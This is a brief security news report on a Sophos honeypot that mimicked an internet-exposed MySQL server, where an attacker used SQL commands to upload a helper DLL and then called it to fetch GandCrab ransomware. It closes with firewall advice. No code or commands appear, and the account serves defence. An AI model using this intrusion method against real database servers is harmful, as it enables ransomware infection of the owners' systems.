Security experts setup a honeypot to lure attackers into an exposed insecure MySQL server and install GandCrab ransomware.
Sophos published details of the attack on an internet-facing honeypot emulated MySQL server with exposed default port of 3306/tcp. Although the database system was running Linux, this did not stop the bad actor from downloading a Windows executable used to install ransomware.
According to the report, the attacker first uses SQL database commands to upload a small helper DLL file to the target SQL server. The actor then invokes the same DLL as a database function to retrieve the GandCrab ransonsomware payload from remote system controlled by the attacker.
One of the lessons learned from the attack is server admins should restrict internet access via firewalls to their database servers over default port 3306.
Database access should be limited to only trusted systems/networks and ports should not be exposed wide open to the internet.